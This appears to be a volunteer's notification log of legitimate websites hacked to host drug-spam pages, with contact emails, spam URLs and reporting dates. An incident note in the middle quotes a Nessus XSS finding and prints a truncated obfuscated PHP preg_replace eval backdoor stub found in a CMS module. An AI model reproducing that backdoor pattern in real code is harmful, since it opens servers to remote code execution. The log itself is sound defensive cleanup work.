Hit 2. prototypeplayground.net Incomplete site, looks abandoned |
Whois leads to: IBRENNAN@B-ARCH.COM abuse@a2hosting.com Notified 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CEUQFjAB&url=http%3A%2F%2Fprototypeplayground.net%2F%3Frvt%3D43&ei=tkGWUoaYJJLioAT924KABg&usg=AFQjCNFd1i9_uAuE_m05o9sx43tdH0i5EA&sig2=6U3EGHKf7rTHEy79iMzohg&bvm=bv.57155469,d.cGU
|
Hits 3 and 4. thiefandbandit.com |
Previously contacted |
|
Hit 5. columbiagreenhouse.com Nursery School in New York |
info@columbiagreenhouse.com info@sunraycomputer.com Notified 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CFoQFjAE&url=http%3A%2F%2Fcolumbiagreenhouse.com%2Foldsite%2Fphotos%2F1%2F%3Ft%3D493&ei=tkGWUoaYJJLioAT924KABg&usg=AFQjCNHkz0Bfywio3VD3-Ynd3KpcDgOjEg&sig2=AY1lTmrGq1xvVjlW9shq6A&bvm=bv.57155469,d.cGU&cad=rja
|
Hit 6. viagra.com Looks like a legitimate pharmacy site! |
http://www.viagra.com/buy-real-viagra.aspx
| |
Hit 7. yelp.com Legitimate site |
http://www.yelp.com/search?find_desc=viagra&find_loc=San+Francisco%2C+CA
| |
Hit 8. canadadrugs.com Looks legitimate |
https://www.canadadrugs.com/products/viagra
| |
Hit 9. coreynahman.com Looks legitimate |
http://www.coreynahman.com/viagra.html
| |
Hits 10-11. anewwayoflife.org Site was down, but came back up on 11-30-13 |
Twitter: @SusanBurtonLA Informed 11-30-13 |
http://anewwayoflife.org/buy-viagra-perth/
http://anewwayoflife.org/buy-viagra-store/
|
Hit 12. vosh.org VOLUNTEER OPTOMETRIC SERVICES TO HUMANITY |
http://vosh.org/contact
Notified 11-27-13 |
http://www.vosh.org/viagraonline/
Directly hosted |
Hit 13. buyviagraonlineman.com |
Whois shows:
Owner Name: Whois Protection
Owner Street: Fablovka 404 (All postal mail rejected)
Owner City: Pardubice
Owner ZIP: 53352
Owner Country: CZ
Owner E-Mail: buyviagraonlineman.com
A Czech anonymizer with a Russian DNS server; looks like the center of the operation. I doubt anyone there cares about them hacking colleges outside Russia, anyway. |
http://buyviagraonlineman.com/
|
Hit 14-15. www.iospress.nl |
Previously notified |
|
Hit 16. sedl.org |
Already cleaned! |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CG8QFjAFOAo&url=http%3A%2F%2Fautism.sedl.org%2Findex.php%2Fabout-us&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNF04D1usOzrM_WTi9iKqfW1yDYwRQ&sig2=0DyJZ2LRBatr0LwV4SVG3A&bvm=bv.57155469,d.cGU
|
Hit 17. kotous.com |
Already cleaned! |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CHgQFjAGOAo&url=http%3A%2F%2Fkotous.com%2Fcontact-us%2F&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNFbXdGZWiGuIcZfSltwPJwdufInug&sig2=puKYoDZg2lep7EkTKaTWMA&bvm=bv.57155469,d.cGU
|
Hit 18. larkenrose.com |
Already cleaned! |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CIABEBYwBzgK&url=http%3A%2F%2Fwww.larkenrose.com%2Fstore.html&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNEeIKGkJg-2YhCc2AFkz142pFuAZw&sig2=ysxTuu4bJ_nGztS7-RIHaw&bvm=bv.57155469,d.cGU
|
Hit 19. becomehealthyandrich.com A front for the same scammers, most links are broken, the one that works goes to one of the same pages |
Whois:
Registrar WHOIS Server: whois.dynadot.com
Registrar: DYNADOT LLC
Registrar IANA ID: 472
Registrar Abuse Contact Email: Email Masking Image@dynadot.com
Registrant Name: Gareev Anatoliy
Registrant Street: Khokhryakova, 2, 15
Registrant City: Perm
Registrant State/Province: Perm
Registrant Postal Code: 614000
Registrant Country: RU
Registrant Email: Email Masking Image@gmail.com
Name Server: ns1.dietrichnames.com
Name Server: ns2.dietrichnames.com
Once again, that looks like people who probably don't care about the hacking these guys are doing. |
http://becomehealthyandrich.com/
|
Hit 20. neara.org NEW ENGLAND ANTIQUITIES RESEARCH ASSOCIATION |
deveau@chebucto.ns.ca danleary@mrf-furnaces.com krosspt@lincoln.midcoast.com Notified 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CJABEBYwCTgK&url=http%3A%2F%2Fneara.org%2F%3Fcbe%3D819&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNFO3d8aBdbePz5xvmesAPwfKG3iVg&sig2=mxfQ9TOraOaroILDR8Gg2A&bvm=bv.57155469,d.cGU
|
Hit 30. pharmacyathome.com |
A scam site according to
http://www.scamadviser.com/
|
http://www.pharmacyathome.com/
|
Hit 31. absecon.com Site unfinished, but links to http://abseconfrp.com/Home_Page.php , a mill in NJ |
composites@absecon.com abuse@absecon.com security@absecon.com Notified 11-27-13 |
http://www.absecon.com/buy-cheap-viagra/
Many more linked from that page
|
Hits for "buy viagra online" | ||
Hit 4 icheapviagraonline.com Hosting one of the known scam pages |
Whois shows a site registered privately in China.
But they use CoudDNS servers, and they have an abuse form here:
Reported 11-27-13 |
|
Hit 7. longislandassociation.org |
KLaw@longislandassociation.org mcohen@longislandassociation.org Notified 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CHEQFjAG&url=http%3A%2F%2Fwww.longislandassociation.org%2Fprinters%2F&ei=eFaWUr2WAYjooASo-YCwCg&usg=AFQjCNGmFrSsYf0tyBbsa88MsNOQh3kTkA&sig2=ZEqZcFYj3mrYSLBGkXbn0A&bvm=bv.57155469,d.cGU
|
Hit 9. harvestworks.org |
Already cleaned! |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CIEBEBYwCA&url=http%3A%2F%2Fwww.harvestworks.org%2F&ei=eFaWUr2WAYjooASo-YCwCg&usg=AFQjCNEoRhXS212-VVkrLPF6xdvKaYERnw&sig2=2AJG85ij6TUvMXzt1Dccxg&bvm=bv.57155469,d.cGU
|
Hit 10. accessrx.com Seems legitimate |
| |
Hit 11. stbf.org Strengthening The Black Family, Incorporated, NC |
nikki.smith@co.wake.nc.us torraine@torraine.com Notified 11-27-13 |
http://www.stbf.org/viagra/
And many other pages linked to from that page
|
Linked from stbf.org: calsport.org |
bjennings@calsport.org webmaster@calsport.org
|
http://calsport.org/cialis-cost/
And many other pages linked to from that page
|
Linked from stbf.org: growandknow.org NYC |
marni@growandknow.org marni.summer@gmail.com |
http://growandknow.org/order-viagra/
And many other pages linked to from that page
|
Hit 14. nfayearbooks.com Newburgh Free Academy |
Alerted by contact form 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFIQFjADOAo&url=http%3A%2F%2Fnfayearbooks.com%2F%3Fnfa%3D147&ei=zFmWUreqOcj2oAS4mIH4DA&usg=AFQjCNHvbMVLhM-OtysNebGQOWvFnYZZ8g&sig2=UDaWFK1voZ9j702tX7zNIA&bvm=bv.57155469,d.cGU
|
Hit 19. qhull.org Part of uiuc.edu (My alma mater!) |
qhull@qhull.org webmaster@www.geom.uiuc.edu https://illinois.edu/fb/sec/7175665 Notified 11-27-13 |
http://www.qhull.org/get-viagra-without-prescription/
|
Hit 20. whiteswanrecords.com |
feedback@whiteswanrecords.com http://cccc.co.za/contact/ Notified 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIMBEBYwCTgK&url=http%3A%2F%2Fwww.whiteswanrecords.com%2Fwebcomunity%2F&ei=zFmWUreqOcj2oAS4mIH4DA&usg=AFQjCNEuDUjPGMF511XB_epwsPjgjY4Fhw&sig2=Ve5vzSPQwh94djFgBMAApg&bvm=bv.57155469,d.cGU
|
Hits for "Buy Cialis" | ||
Hit 1-2. easyteammanager.com and drury.edu |
Already cleaned! |
|
Hit 3. epmonthly.com Emergency Physicians Monthly, NY |
mplaster@epmonthly.com editor@epmonthly.com info@epmonthly.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CFgQFjAC&url=http%3A%2F%2Fwww.epmonthly.com%2Fadvertise%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNGcBxkYuED8Ll9C-K-UXIRhBp0eVA&sig2=XerqOWvX5isgvyuhZZ1jbQ&bvm=bv.57155469,d.cGU
|
Hit 4. enconline.com ElDorado National, bus manufacturer, CA and KS |
info@eldorado-ca.com rmendoza@eldorado.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CGEQFjAD&url=http%3A%2F%2Fwww.enconline.com%2Fbuycialisonline%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNG4uz8gygcQtQqRIVWLoJRUY4uRGQ&sig2=Gcq1hPZAWz-nEn53xfqseg&bvm=bv.57155469,d.cGU
|
Hit 5. fabrand.com Seller of duck decoys, KS |
abuse@fabrand.com security@fabrand.com jdavis@bushnell.com abuse@godaddy.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CGkQFjAE&url=http%3A%2F%2Fwww.fabrand.com%2Fbuycialis%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNGggBh5qW6-y0vZbJeyMRnrNBwr2A&sig2=oszw8VqQGtnGbduDlye4ag&bvm=bv.57155469,d.cGU
|
Hit 6. bobburdenski.com Fund-raising trainer in Chicago |
Info@BobBurdenski.com Abuse@BobBurdenski.com security@BobBurdenski.com @annualfund on Twitter Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CHEQFjAF&url=http%3A%2F%2Fwww.bobburdenski.com%2Fnc.php&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNF-4s_C1bx03EfQa_Fj7SAs2VMR_w&sig2=cwUZNQJEBShddPgxj__iIg&bvm=bv.57155469,d.cGU
|
Hit 7-10 look legitimate. |
http://www.scamadviser.com/is-buycialisonlineusa.biz-a-fake-site.html
| |
Hit 13. selectyourgifts.com |
service@selectyourgifts.com |
This is apparently a scam site http://inspirationforeverydaylife.blogspot.com/2009/01/scam-alert-wwwselectyourgiftscom.html |
Hit 14. vanguarddefense.com Manufacturer of drones in Texas |
info@vanguarddefense.com media@vanguarddefense.com security@vanguarddefense.com abuse@vanguarddefense.com Twitter: @schipul @Tendenci Notified 11-28-13 |
http://vanguarddefense.com/Cialis
http://vanguarddefense.com/buy-cialis |
Hit 16-17. anewwayoflife.org Website is damaged, cannot load the selling pages |
| |
Hit 19. icrisat.org Crops research org. |
Twitter: @icrisat @CGIAR
ICRISAT@CGIAR.ORG Notified 11-28-13 |
http://www.icrisat.org/cialis/
|
Hit 20. emilystrange.com Clothing and games |
noah@osmicDebris.com Twitter: @EmilyTheStrange Notified 11-28-13 |
http://www.emilystrange.com/compress/
|
Hit 23. advantageconnectpro.com/ |
info@advantageconnectpro.com Informed via live chat Notified 11-28-13 |
http://advantageconnectpro.com/acp/tadalafil-canada
|
Hit 23. apoptic.com A blog from California |
apoptic@gmail.com abuse@godaddy.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=23&ved=0CFoQFjACOBQ&url=http%3A%2F%2Fwww.apoptic.com%2Fbota%2Fbuy-cialis&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNHjCKp-tb-oUff3KzkIeNBrA113Pg&sig2=uIJ9dlrt6gq87QeA6GJM-g&bvm=bv.57155469,d.cGU
|
Hit 25. ephudson.com A band, I think |
Twitter: @ep_hudson @PhillnMyself @_kosher
Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=25&ved=0CGoQFjAEOBQ&url=http%3A%2F%2Fephudson.com%2Fwhere-buy-cialis%2F&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNG7mJ_BKg7EMqWHWFpD8q4xn2gqjg&sig2=7vXOnx538p_bweUCUEWlsg&bvm=bv.57155469,d.cGU
|
Hit 27. lamazoucheese.com Cheese seller in NYC |
lamazouinc@yahoo.com hachhouch@gmail.com domain.tech@yahoo-inc.com Notified 11-28-13 |
http://lamazoucheese.com/buy_cialis_online
|
Hit 29. www.bsfsry.com Big Fork Scenic Railway, KY |
info@bsfsry.com abuse@godaddy.com busmgr@bsfsry.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CIYBEBYwCDgU&url=http%3A%2F%2Fwww.bsfsry.com%2Forder-cialis%2F&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNGDcrRXkh9-mE12psa8GMnP0GffyA&sig2=JNcFVZ-wL6Kg99Pl7Cl_hQ&bvm=bv.57155469,d.cGU
|
Hit 30. ysunews.com Youngstown State University, OH |
techdesk@ysu.edu abuse@ysu.edu security@ysu.edu mbailey@ysu.edu clbidwell@ysu.edu Twitter: @YSUPolice @youngstownstate Notified 11-28-13 |
http://www.ysunews.com/buy-cialis-professional/
|
Hits for "Buy Cialis Online" | ||
Hit 20. rubinsboston.com Restaurant in Boston, MA |
tiffcfeng@gmail.com bostonuadlab@gmail.com info@rubinsboston.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CI8BEBYwCTgK&url=http%3A%2F%2Frubinsboston.com%2Fbuy-cialis-online-usa%2F&ei=JomXUug40eigBJzkgYAE&usg=AFQjCNFsDdnlKcmJGS1Sk_WzkaQvLqAVVg&sig2=qM58_P3b_9s2VAUJdczyUg&bvm=bv.57155469,d.cGU
|
Hit 21. elkton.org Town of Elkton, MD |
Twitter: @TownofElkton
administration@elkton.org Notified 11-28-13 |
http://www.elkton.org/sec/
|
Hit 24. camdenhealth.org Camden Coalition of Healthcare Providers, NJ |
http://www.camdenhealth.org/contact-us/
Twitter: @camdenhealth Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CFEQFjADOBQ&url=http%3A%2F%2Fwww.camdenhealth.org%2Flogin-options%2F&ei=yIqXUpGCEov8oATE24DgDw&usg=AFQjCNEn7PmNWUPZRmGUDC3R06LrKw026Q&sig2=FgkDg5a_J3kJ9pguNNyv-Q&bvm=bv.57155469,d.cGU
|
Hit 32. imintcenter.org DARPA Research Center, U. of Colorado |
leeyc@colorado.edu fitzstephens@colorado.edu Twitter: @cuboulder Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CEIQFjABOB4&url=http%3A%2F%2Fwww.imintcenter.org%2F&ei=FY2XUu70FsbpoATDioL4Cw&usg=AFQjCNH39noUwCOMi2va9wg_IATUF2zNQQ&sig2=vqeIlTmoSm0OgtOm5CdS3g&bvm=bv.57155469,d.cGU
|
Hit 33. thesemblog.com Web marketing company |
along@schipul.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=33&ved=0CEkQFjACOB4&url=http%3A%2F%2Fthesemblog.com%2FCialis%2F&ei=FY2XUu70FsbpoATDioL4Cw&usg=AFQjCNEW3JLQKT-8e3iXVcfQik7L8dubIg&sig2=6tDldtS5X78vDML-7emR-Q&bvm=bv.57155469,d.cGU
|
Hits for "Buy Levitra" | ||
Hit 1. amahouston.net Marketing in Texas |
info@amahouston.org Loaded the rogue page once, but not again ? |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CD8QFjAA&url=http%3A%2F%2Famahouston.net%2Fpage%2F2%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNHhyjsT9CxOmYcsHOezVeCqMxEJ2g&sig2=KY0DGCO5y3iBfWXJ8jrCag&bvm=bv.57155469,d.cGU
|
Hit 3. www.workamper.com Employment in Arkansas |
support@workamper.com john@workamper.com Notified 11-28-13 |
http://www.workamper.com/buyvardenafil/
|
Hit 5. missillinois.org |
ILStateDir@missillinois.org statedirector@missillinois.org Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CGEQFjAE&url=http%3A%2F%2Fmissillinois.org%2Fbuy-levitra-now%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNFY-ZoBxQ14fbGabwcZU6OIgpEt2A&sig2=XOQDMQ7cf4NqMJ-2blkXbg&bvm=bv.57155469,d.cGU
|
Hit 6. www.theoriginalscrapbox.com |
http://www.theoriginalscrapbox.com/contacts
Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CGgQFjAF&url=http%3A%2F%2Fwww.theoriginalscrapbox.com%2Fapp%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNFjTsOqDiUp6a69N_jQ55x6TPLzKw&sig2=7azPXBhIA8JoaAc88fokuQ&bvm=bv.57155469,d.cGU
|
Hit 7. www.capitolcorridor.org A train in Oakland, CA |
http://mygov.us/task/city/knowledge_base/submit_request.php?cityname=368&module=rt Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CG8QFjAG&url=http%3A%2F%2Fwww.capitolcorridor.org%2Fabout_ccjpa%2F%3Fy2fwa%3D427441&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNERTepzJQanRWT-wJJwcoCH_mIxag&sig2=53YLw06eTrqji6hTxghprA&bvm=bv.57155469,d.cGU
|
Hit 13. ohsweb.ohiohistory.org Ohio Historical Society |
collections@ohiohistory.org http://www.ohiohistory.org/about-us/contact/website Notified 11-28-13 |
http://ohsweb.ohiohistory.org/strocs/
|
Hit 18. www.caratsmartdiamonds.com |
abuse@godaddy.com ahadany@cox.net abuse@caratsmartdiamonds.com security@caratsmartdiamonds.com Notified 11-28-13 |
www.caratsmartdiamonds.com/buy-levitra-overnight/
|
Hit 20. primogrill.com |
http://primogrill.com/contact/
Notified 11-29-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIoBEBYwCTgK&url=http%3A%2F%2Fprimogrill.com%2Fcategory%2Fbuy-levitra-uk%2F&ei=uriXUqLYHJTnoAS3l4GwBA&usg=AFQjCNH9WoyKVZ976hSgxrPgXjNfPmCAQA&sig2=3-qDh5IgEOazWlZ_11l8sQ&bvm=bv.57155469,d.cGU
|
For my part on the near.org web site I have replaced the rogue .htaccess file and deleted two files that it pointed to. I am not enough of a hacker to know how to proceed from here.
"Did a Nessus scan of the box earlier. It found... Web Server Generic XSS Description The remote host is running a web server that fails to adequately sanitize request strings of malicious JavaScript. By leveraging this issue, an attacker may be able to cause arbitrary HTML and script code to be executed in a user's browser within the security context of the affected site."
Some of the modules for the CMS software seem to have been recently replaced. Some of the directories within ~/stecon/WWW/modules/ are new and are owned by www-data (Yes, apache shouldn't have been able to write there: first of probably many apologies from me). In particular, the file ~/stecon/WWW/modules/nuSOAP/nuSOAP.module.php now had a 20K block of multiply-encrypted code at the start. I include below the results of base64-decoding the code.
preg_replace("/IwOIddDwZObky1eqwBAZlfY/e", "[long encoded string omitted]"^"[long string of \x-escaped bytes omitted]", "IwOIddDwZObky1eqwBAZlfY");
Organization | Emails | Malicious URL |
---|---|---|
Hits for "Viagra" | | |
Hit 11. kim-stafford.com Writer in Oregon | Whois leads to: abuse@godaddy.com krs@lclark.edu Reported on 11-30-13 | http://kim-stafford.com/?lze=810 Directly hosted page |
Hit 31-21. rvrphoto.com Photography in Ohio | rkoti@me.com abuse@godaddy.com vamsi@vam.si Reported on 11-30-13 | http://rvrphoto.com/www-viagra-sales/ http://rvrphoto.com/ed-50mg-viagra/ |
Linked from an infected page: bioimagexd.net Open Source Medical Imaging Software | info@bioimagexd.net support@netfirms.com lassi.paavolainen@jyu.fi Reported on 11-30-13 | http://www.bioimagexd.net/www-viagra-uk/ http://www.bioimagexd.net/on-viagra-spain/ http://www.bioimagexd.net/www-buy-viagra-on-the-internet/ http://www.bioimagexd.net/med-50mg-viagra/ |
Linked from an infected page: annehills.com Singer | booking@annehills.com anne@annehills.com abyse@web.com annehills@juno.com mark-web@singout.org robbietrapp@hotmail.com Reported on 11-30-13 | http://www.annehills.com/md-cheap-viagra-from-canada/ |
Hit 33: thejameshouse.org Help for persons who have been sexually abused, in Virginia | chana@thejameshouse.org jane@thejameshouse.org Reported on 11-30-13 | http://thejameshouse.org/?an=784 |
Hit 34: africanamericansoul.com | abuse@godaddy.com AFRICANAMERICANSOUL.COM@domainsbyproxy.com Reported on 11-30-13 | http://africanamericansoul.com/?jnk=284 |
Hit 35: dfma.org Durham FM Association | http://dfma.org/index.php?option=com_contact&view=contact&id=1&Itemid=24 Reported on 11-30-13 | http://dfma.org/?yx=795 |
Hit 36: jasonshaeffer.com | support@netfirms.com jasonshaeffer@gmail.com Reported on 11-30-13 | http://jasonshaeffer.com/web-viagra-rx/ |
Hit 37: sikorskyarchives.com CT | iisha@snet.net LIBERTINO481@YAHOO.COM abuse@godaddy.com johnmk26@optonline.net Reported on 11-30-13 | http://www.annehills.com/md-cheap-viagra-from-canada/ |
Hit 39: gingergrayhamartgallery.com Site looks abandoned since 2002 | josh@coyote-canyon.com abuse@wildwestdomains.com GINGERGRAYHAMARTGALLERY.COM@domainsbyproxy.com Reported on 11-30-13 | http://gingergrayhamartgallery.com/?ib=629 |
Hit 40. www.abeewell.com | Registered in Russia, no real website, no one to notify | http://www.abeewell.com/ |
Hits for "Cialis" | | |
Hit 11. huwib.org Harvard Undergraduate Women in Business, On-Campus, Harvard, MA | kshankar@huwib.org rwang@huwib.org hlim@college.harvard.edu info@huwib.org Reported on 11-30-13 | http://huwib.org/?mfh=798 |
Hits 12-16. seamass.org Structural Engineers Association of MA | Contact page missing, but Google cache has one from Nov. 1, 2013. Officers page missing. About page missing. Google says "This site may be hacked". info@seamass.org Reported on 11-30-13 | http://www.seamass.org/cialis-action/ http://www.seamass.org/the-cialis-commercial/ http://www.seamass.org/dr-cialis/ http://www.seamass.org/a-cialis-dosage/ http://www.seamass.org/cialis-in-botlle/ |
Hits 17-21. honorflighttwincities.org MN | crazyjerry45@hotmail.com abuse@honorflighttwincities.org security@honorflighttwincities.org Reported on 11-30-13 | http://honorflighttwincities.org/a-carvedilol-cialis/ http://honorflighttwincities.org/ed-cialis-action/ http://honorflighttwincities.org/a-cialis-action/ http://honorflighttwincities.org/now-5mg-cialis/ |
Hit 23. musehousecenter.com | musehousecenter@gmail.com abuse@web.com em@a2pwebdesignn.com webmaster@a2pwebdesignn.com Reported on 11-30-13 | http://musehousecenter.com/?pav=852 |
Hit 25. laennecsocietyphilly.org | laennecsocietyphilly.org/cialis-pills/ Home page hacked, and many others, including the contact page | |
Hit 26. krcs.org The Kansas Respiratory Care Society | suzanne.bollig@haysmed.com curtis.kidwell@viachristi.org dconyers@kumc.edu Reported on 11-30-13 | http://krcs.org/?mu=957 |
Hit 28. shoplocalunioncounty.org | info@shoplocalunioncounty.org ispwebmaster@nrtc.coop ispwebmaster@nrtc.org Reported on 11-30-13 | http://shoplocalunioncounty.org/?yh=655 |
Hit 29. lindsay-stern.com | lstern13@amherst.edu editor@scramblerbooks.com Reported on 11-30-13 | http://lindsay-stern.com/?sx=701 |
Hit 36. kayakcentre.com RI | funn@kayakcentre.com abuse@web.com Reported on 11-30-13 | http://kayakcentre.com/?nlc=4 |
Hits 37-38. www.ncherm.org Safer Schools in PA | brett@ncherm.org daniel@atixa.org kate@ncherm.org Reported on 11-30-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=37&ved=0CGUQFjAGOB4&url=http%3A%2F%2Fwww.ncherm.org%2F%3Fid%3D523163&ei=CWGaUrnQIMzmoATosYGgBA&usg=AFQjCNH364-8GMxasYfp3NRR-O28jyCYGg&sig2=a-YGpqrOUYHMwpyafcBnlQ&bvm=bv.57155469,d.cGU https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=38&ved=0CGwQFjAHOB4&url=http%3A%2F%2Fwww.ncherm.org%2F%3Fid%3D523146&ei=CWGaUrnQIMzmoATosYGgBA&usg=AFQjCNEaX0pKE5rm6vgGxLnaawb7nc5HrA&sig2=Evx-gEJC8Ft29ZMuCLDcWw&bvm=bv.57155469,d.cGU |
Hits for "Levitra" | | |
Hit 20. elupton.com Art critic in NYC, works at the Smithsonian | abuse@web.com cooperhewittpress@si.edu cheducation@si.edu Reported on 11-30-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIwBEBYwCTgK&url=http%3A%2F%2Felupton.com%2Flevitra-online-shopping%2F&ei=anSaUt23CcL3oATa64DQCw&usg=AFQjCNHCTfQkSNjiD1Pg277HR2mkACDLiQ&sig2=aGO9sPWuMV-iTEKkLQJYpA&bvm=bv.57155469,d.cGU&cad=rja |
Hit 24. nintendoeverything.com | http://nintendoeverything.com/contact-us/ Informed on 11-30-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CE8QFjADOBQ&url=http%3A%2F%2Fnintendoeverything.com%2Flevitra-overnight%2F&ei=EHeaUt3CGNDhoAScmoLoDA&usg=AFQjCNGUMuBxkohDi73l49gNteVswgpZwA&sig2=A9K4p0NwxpKirvLQiR-VLw&bvm=bv.57155469,d.cGU |
Hit 32. www.thesmell.org Los Angeles Art Space | http://www.thesmell.org/contact Informed on 11-30-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CE0QFjABOB4&url=http%3A%2F%2Fwww.thesmell.org%2F&ei=YnmaUv6wN4n3oASg5ICoCA&usg=AFQjCNFyvDQw020irw1tkS0kbveE9cYflw&sig2=3iknvwdTneGHEMpZHtGWtg&bvm=bv.57155469,d.cGU |
Hits for "buy oxycontin online" | | |
Hit 37. gravatar.com | compliance@markmonitor.com domains@automattic.com Informed on 11-30-13 | gravatar.com/seroxycontiner |
Hit 47. www.wpda.org World Parkinson Disease Association | info@wpda.org aip@fondazioneparkinson.com gianluca@parkinson.it support@register.it Informed on 11-30-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=47&ved=0CFoQFjAGOCg&url=http%3A%2F%2Fwww.wpda.org%2Fappuntamenti.html&ei=UH6aUrvEA8zjoAT4lIKQDw&usg=AFQjCNGNQuJ5VcTxDyyoJnGod70cYSlNKA&sig2=1pKfr7eeBoHHgZb4ARetzw&bvm=bv.57155469,d.cGU |
Hits for "buy oxy" | | |
Hit 25. https://archive.org/ | info@archive.org Informed on 11-30-13 | https://archive.org/details/Oxy5Mg30Mg |
Hits for "vardenafil" | | |
Hit 26. hugetheater.com | butch@hugetheater.com jill@hugetheater.com Contacted 11-30-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=26&ved=0CFoQFjAFOBQ&url=http%3A%2F%2Fwww.hugetheater.com%2Fabout-us%2Fdonate%2F&ei=tZ6aUsa8DZbcoASHvICYCA&usg=AFQjCNHIvCeV7jqz6PPDQW-gGhSuCOi3Fg&sig2=dhKAVGdbEftOyy58dQMYYA&bvm=bv.57155469,d.cGU |
Hit 29. thedeadexs.com | info@thedeadexs.com Informed on 11-30-13 | http://thedeadexs.com/vardenafil/ |
Hit 32. actualidad7.com | ad@actualidad7.com redaccion@actualidad7.com Informed on 11-30-13 | http://actualidad7.com/cheapest-vardenafil/ |
Hit 33. aceita.com.br | negocios@aceita.com.br suporte@aceita.com.br Informed on 11-30-13 | http://aceita.com.br/vardenafil-hcl-20mg/ |
Hit 38. larryelmore.com | sales@larryelmore.com Informed on 11-30-13 | http://larryelmore.com/vardenafil-cheapest/ |
Hits for "284-3222" | | |
Hit 7. www.whereisasturias.com | Twitter: @whereisasturias Informed 12-1-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CF8QFjAG&url=http%3A%2F%2Fwww.whereisasturias.com%2Fcanada%2F%3Fa%3D322&ei=eJabUsr-KIXUoASo-YLIAQ&usg=AFQjCNE0qR8SUJi4t9Qr_I7c2yypUR0LmQ&sig2=COhUDi7uTC6VtrrA77EKig&bvm=bv.57155469,d.cGU |
Hit 8. www.nlsd113.com Northern Lights School Division, Canada | centraloffice@nlsd113.net suboffice@nlsd113.net Informed 12-1-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGYQFjAH&url=http%3A%2F%2Fwww.nlsd113.com%2Frr%2Findex.php%3Fp%3D859&ei=eJabUsr-KIXUoASo-YLIAQ&usg=AFQjCNEhHshG2GZ5KQAapm1uGpcm9JfyOw&sig2=Iu19xuS3akpXaZcswkP5HA&bvm=bv.57155469,d.cGU |
Hits for "buy armidex" | | |
Hit 1. healthyagingcouncil.org unthsc.edu U. of N. Texas | UNTSweb@untsystem.edu webmaster@unthsc.edu urcm@unt.edu Informed 12-1-13 | http://www.healthyagingcouncil.org/getarimidex/ |
Hit 5. www.purevolume.com Music promoter | randy@purevolume.com vchang@spinmedia.com brittany@purevolume.com Informed 12-1-13 | http://www.purevolume.com/arimidex |
Hit 6. www.zestcreative.ie Design co. in Ireland | info@zestcreative.ie Informed 12-1-13 | http://www.zestcreative.ie/rev/.svn/arimidex.html |
Hit 9. flavors.me | http://us.moo.com/help/contact-us.html Informed 12-1-13 | http://flavors.me/midelle |
